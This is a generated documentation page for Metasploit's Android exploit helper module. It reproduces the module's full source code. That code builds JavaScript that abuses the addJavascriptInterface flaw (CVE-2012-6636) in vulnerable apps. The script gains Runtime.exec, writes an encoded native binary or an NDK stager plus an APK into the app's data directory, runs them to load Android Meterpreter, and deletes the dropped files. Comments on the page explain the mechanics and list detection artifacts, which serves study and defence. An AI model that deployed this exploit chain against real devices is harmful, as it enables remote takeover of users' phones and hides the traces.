<!DOCTYPE html>
<html>
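<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Android
&mdash; Documentation by YARD 0.9.37
</title>
<!-- type="text/css" is the default for rel="stylesheet" and the trailing "/" on a void element is ignored by the parser, so both are dropped -->
<link rel="stylesheet" href="../../css/style.css">
<link rel="stylesheet" href="../../css/common.css">
<!-- Page-level globals (presumably consumed by app.js for the class list / search). They stay inline, which means a strict CSP on this site would need a nonce or hash for this one block -->
<script>
pathId = "Msf::Exploit::Android";
relpath = '../../';
</script>
<!-- charset= on <script> is obsolete and type="text/javascript" is the default; the order (jquery.js before app.js) is preserved -->
<script src="../../js/jquery.js"></script>
<script src="../../js/app.js"></script>
</head>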
<body>
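<div class="nav_wrap">
<!-- An iframe needs a title to have an accessible name; the src is the same-origin class list generated by YARD -->
<iframe id="nav" title="Class list" src="../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>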
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../_index.html">Index (A)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span>
&raquo;
<span class="title">Android</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Android
</h1>
<div class="box_info">
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/android.rb</dd>
</dl>
</div>
<h2>
Constant Summary
<small><a href="#" class="constants_summary_toggle">collapse</a></small>
</h2>
<dl class="constants">
<dt id="SUPPORTED_ARCHES-constant" class="">SUPPORTED_ARCHES =
<div class="docstring">
<div class="discussion">
<p>Since the NDK stager is used, arch detection must be performed</p>
</div>
</div>
<div class="tags">
</div>
</dt>
<dd><pre class="code"><span class='lbracket'>[</span> <span class='const'>ARCH_ARMLE</span><span class='comma'>,</span> <span class='const'>ARCH_MIPSLE</span><span class='comma'>,</span> <span class='const'>ARCH_X86</span> <span class='rbracket'>]</span></pre></dd>
<dt id="DEFAULT_ARCH-constant" class="">DEFAULT_ARCH =
<div class="docstring">
<div class="discussion">
<p>Most Android devices are ARM</p>
</div>
</div>
<div class="tags">
</div>
</dt>
<dd><pre class="code"><span class='const'>ARCH_ARMLE</span></pre></dd>
<dt id="NDK_FILES-constant" class="">NDK_FILES =
<div class="docstring">
<div class="discussion">
<p>Some of the default NDK build targets are named differently from msf's built-in constants. This mapping allows the ndkstager file to be looked up from the msf constant.</p>
</div>
</div>
<div class="tags">
</div>
</dt>
<dd><pre class="code"><span class='lbrace'>{</span>
<span class='const'>ARCH_ARMLE</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>armeabi</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='const'>ARCH_MIPSLE</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>mips</span><span class='tstring_end'>&#39;</span></span>
<span class='rbrace'>}</span></pre></dd>
</dl>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#add_javascript_interface_exploit_js-instance_method" title="#add_javascript_interface_exploit_js (instance method)">#<strong>add_javascript_interface_exploit_js</strong>(arch) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#linux_exe_js-instance_method" title="#linux_exe_js (instance method)">#<strong>linux_exe_js</strong>(arch) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#ndkstager-instance_method" title="#ndkstager (instance method)">#<strong>ndkstager</strong>(stagename, arch) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>The NDK stager is used to launch a hidden APK.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#stager_js-instance_method" title="#stager_js (instance method)">#<strong>stager_js</strong>(arch) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
</ul>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<!-- Rendered from lib/msf/core/exploit/android.rb lines 20-55. The Ruby method returns a JavaScript string:
     exec() reads a Runtime.exec() process's stdout byte by byte and attemptExploit() probes every property of
     "top" for a Java bridge by calling getClass().forName('java.lang.Runtime'), then fetches the pid and the
     Runtime object. The interpolated helper is stager_js when payload.arch[0] == ARCH_DALVIK, otherwise
     linux_exe_js; both rely on the "runtime" and "pid" variables and the exec() function declared here, so
     neither helper's output is standalone JavaScript. Note that the read loop stops at the first byte that is
     0 or below, so a NUL byte truncates exec() output as well as EOF (-1). -->
<h3 class="signature first" id="add_javascript_interface_exploit_js-instance_method">
#<strong>add_javascript_interface_exploit_js</strong>(arch) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/android.rb', line 20</span>
<span class='kw'>def</span> <span class='id identifier rubyid_add_javascript_interface_exploit_js'>add_javascript_interface_exploit_js</span><span class='lparen'>(</span><span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
function exec(runtime, cmdArr) {
var ch = 0;
var output = &#39;&#39;;
var process = runtime.exec(cmdArr);
var input = process.getInputStream();
while ((ch = input.read()) &gt; 0) { output += String.fromCharCode(ch); }
return output;
}
function attemptExploit(obj) {
// ensure that the object contains a native interface
try { obj.getClass().forName(&#39;java.lang.Runtime&#39;); } catch(e) { return; }
// get the pid
var pid = obj.getClass()
.forName(&#39;android.os.Process&#39;)
.getMethod(&#39;myPid&#39;, null)
.invoke(null, null);
// get the runtime so we can exec
var runtime = obj.getClass()
.forName(&#39;java.lang.Runtime&#39;)
.getMethod(&#39;getRuntime&#39;, null)
.invoke(null, null);
</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_arch'>arch</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='const'>ARCH_DALVIK</span> <span class='op'>?</span> <span class='id identifier rubyid_stager_js'>stager_js</span><span class='lparen'>(</span><span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span> <span class='op'>:</span> <span class='id identifier rubyid_linux_exe_js'>linux_exe_js</span><span class='lparen'>(</span><span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>
return true;
}
for (i in top) { if (attemptExploit(top[i]) === true) break; }
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<!-- Rendered from lib/msf/core/exploit/android.rb lines 91-112. Emits JavaScript that writes a Linux ELF for
     "arch" (payload.encoded_exe, rendered by Rex::Text.to_octal as backslash-octal escapes for echo -e) into the
     app's private data directory, chmods it 700, starts it in the background through sh -c, then removes it.
     The directory is /data/data/ plus the contents of /proc/PID/cmdline, so the file lands under whatever package
     name the vulnerable app has. "runtime", "pid" and exec() are defined in add_javascript_interface_exploit_js;
     this string is only valid when interpolated there. From a detection standpoint the listing shows the dropped
     file is unlinked right after launch, so the surviving artifacts are the sh -c "echo -e ..." invocation and the
     running process whose argv is the random 8-letter path. -->
<h3 class="signature " id="linux_exe_js-instance_method">
#<strong>linux_exe_js</strong>(arch) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/android.rb', line 91</span>
<span class='kw'>def</span> <span class='id identifier rubyid_linux_exe_js'>linux_exe_js</span><span class='lparen'>(</span><span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span>
<span class='id identifier rubyid_platform_list'>platform_list</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Module/PlatformList.html" title="Msf::Module::PlatformList (class)">PlatformList</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../Module/PlatformList.html#initialize-instance_method" title="Msf::Module::PlatformList#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Module/Platform.html" title="Msf::Module::Platform (class)">Platform</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Module/Platform/Linux.html" title="Msf::Module::Platform::Linux (class)">Linux</a></span></span><span class='rparen'>)</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
var payloadData = &quot;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_to_octal'>to_octal</span><span class='lparen'>(</span><span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_encoded_exe'>encoded_exe</span><span class='lparen'>(</span><span class='label'>arch:</span> <span class='id identifier rubyid_arch'>arch</span><span class='comma'>,</span> <span class='label'>platform:</span> <span class='id identifier rubyid_platform_list'>platform_list</span><span class='rparen'>)</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>\\\\0</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;;
// get the process name, which will give us our data path
// $PPID does not seem to work on android 4.0, so we concat pids manually
var path = &#39;/data/data/&#39; + exec(runtime, [&#39;/system/bin/sh&#39;, &#39;-c&#39;, &#39;cat /proc/&#39;+pid.toString()+&#39;/cmdline&#39;]);
var payloadPath = path + &#39;/</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;;
// build the library and chmod it
runtime.exec([&#39;/system/bin/sh&#39;, &#39;-c&#39;, &#39;echo -e &quot;&#39;+payloadData+&#39;&quot; &gt; &#39;+payloadPath]).waitFor();
runtime.exec([&#39;chmod&#39;, &#39;700&#39;, payloadPath]).waitFor();
// run the payload
runtime.exec([&#39;/system/bin/sh&#39;, &#39;-c&#39;, payloadPath + &#39; &amp;&#39;]).waitFor();
// delete dropped files
runtime.exec([&#39;rm&#39;, payloadPath]).waitFor();
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<!-- Rendered from lib/msf/core/exploit/android.rb lines 115-119. Reads the prebuilt NDK stager from
     <data_directory>/exploits/CVE-2012-6636/<NDK_FILES[arch] || arch>/libndkstager.so in binary mode and
     replaces the PLOAD marker with "stagename". Two edge cases follow from the Ruby semantics of the calls shown:
     File.read raises Errno::ENOENT when no directory exists for "arch" (NDK_FILES only maps ARMLE and MIPSLE, so
     ARCH_X86 falls back to the constant's own value), and String#gsub! returns nil when nothing was replaced, so
     the method returns nil rather than the unmodified bytes if the marker is absent. The caller passes a
     5-character rand_text_alpha value, the same length as PLOAD, presumably so that the binary's layout is
     unchanged by the substitution (confirm against the stager build). -->
<h3 class="signature " id="ndkstager-instance_method">
#<strong>ndkstager</strong>(stagename, arch) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>The NDK stager is used to launch a hidden APK</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
115
116
117
118
119</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/android.rb', line 115</span>
<span class='kw'>def</span> <span class='id identifier rubyid_ndkstager'>ndkstager</span><span class='lparen'>(</span><span class='id identifier rubyid_stagename'>stagename</span><span class='comma'>,</span> <span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span>
<span class='id identifier rubyid_stager_file'>stager_file</span> <span class='op'>=</span> <span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_join'>join</span><span class='lparen'>(</span> <span class='const'><span class='object_link'><a href="../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Config.html" title="Msf::Config (class)">Config</a></span></span><span class='period'>.</span><span class='id identifier rubyid_data_directory'><span class='object_link'><a href="../Config.html#data_directory-class_method" title="Msf::Config.data_directory (method)">data_directory</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>exploits</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>CVE-2012-6636</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="#NDK_FILES-constant" title="Msf::Exploit::Android::NDK_FILES (constant)">NDK_FILES</a></span></span><span class='lbracket'>[</span><span class='id identifier rubyid_arch'>arch</span><span class='rbracket'>]</span> <span class='op'>||</span> <span class='id identifier rubyid_arch'>arch</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>libndkstager.so</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_data'>data</span> <span class='op'>=</span> <span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_read'>read</span><span class='lparen'>(</span><span class='id identifier rubyid_stager_file'>stager_file</span><span class='comma'>,</span> <span class='label'>mode:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>rb</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_data'>data</span><span class='period'>.</span><span class='id identifier rubyid_gsub!'>gsub!</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PLOAD</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_stagename'>stagename</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<!-- Rendered from lib/msf/core/exploit/android.rb lines 57-89. Picks a 5-letter stagename, then emits JavaScript
     that drops two octal-escaped files into the app's data directory (/data/data/ plus /proc/PID/cmdline): the
     patched NDK stager as lib<8 random letters>.so and payload.raw as <stagename>.apk. Both are chmod 700, the .so
     is loaded into the app process with runtime.load() (the in-listing comment says the native library then loads
     the .apk as the stage), and both files are removed afterwards. "runtime", "pid" and exec() come from
     add_javascript_interface_exploit_js, so this string is not self-contained JavaScript. For responders, the
     listing shows the on-disk artifacts are transient; what persists is the foreign shared object mapped into the
     app process and the sh -c "echo -e ..." / chmod / rm command sequence. -->
<h3 class="signature " id="stager_js-instance_method">
#<strong>stager_js</strong>(arch) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/android.rb', line 57</span>
<span class='kw'>def</span> <span class='id identifier rubyid_stager_js'>stager_js</span><span class='lparen'>(</span><span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span>
<span class='id identifier rubyid_stagename'>stagename</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>5</span><span class='rparen'>)</span>
<span class='tstring'><span class='tstring_beg'>%Q|</span><span class='tstring_content'>
// libraryData contains the bytes for a native shared object built via NDK
// which will load the &quot;stage&quot;, which in this case is our android meterpreter stager.
var libraryData = &quot;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_to_octal'>to_octal</span><span class='lparen'>(</span><span class='id identifier rubyid_ndkstager'>ndkstager</span><span class='lparen'>(</span><span class='id identifier rubyid_stagename'>stagename</span><span class='comma'>,</span> <span class='id identifier rubyid_arch'>arch</span><span class='rparen'>)</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>\\\\0</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;;
// the stageData is the JVM bytecode that is loaded by the NDK stager. It contains
// another stager which loads android meterpreter from the msf handler.
var stageData = &quot;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_to_octal'>to_octal</span><span class='lparen'>(</span><span class='id identifier rubyid_payload'>payload</span><span class='period'>.</span><span class='id identifier rubyid_raw'>raw</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>\\\\0</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&quot;;
// get the process name, which will give us our data path
// $PPID does not seem to work on android 4.0, so we concat pids manually
var path = &#39;/data/data/&#39; + exec(runtime, [&#39;/system/bin/sh&#39;, &#39;-c&#39;, &#39;cat /proc/&#39;+pid.toString()+&#39;/cmdline&#39;]);
var libraryPath = path + &#39;/lib</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>.so&#39;;
var stagePath = path + &#39;/</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_stagename'>stagename</span><span class='embexpr_end'>}</span><span class='tstring_content'>.apk&#39;;
// build the library and chmod it
runtime.exec([&#39;/system/bin/sh&#39;, &#39;-c&#39;, &#39;echo -e &quot;&#39;+libraryData+&#39;&quot; &gt; &#39;+libraryPath]).waitFor();
runtime.exec([&#39;chmod&#39;, &#39;700&#39;, libraryPath]).waitFor();
// build the stage, chmod it, and load it
runtime.exec([&#39;/system/bin/sh&#39;, &#39;-c&#39;, &#39;echo -e &quot;&#39;+stageData+&#39;&quot; &gt; &#39;+stagePath]).waitFor();
runtime.exec([&#39;chmod&#39;, &#39;700&#39;, stagePath]).waitFor();
// load the library
runtime.load(libraryPath);
// delete dropped files
runtime.exec([&#39;rm&#39;, stagePath]).waitFor();
runtime.exec([&#39;rm&#39;, libraryPath]).waitFor();
</span><span class='tstring_end'>|</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:01:10 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>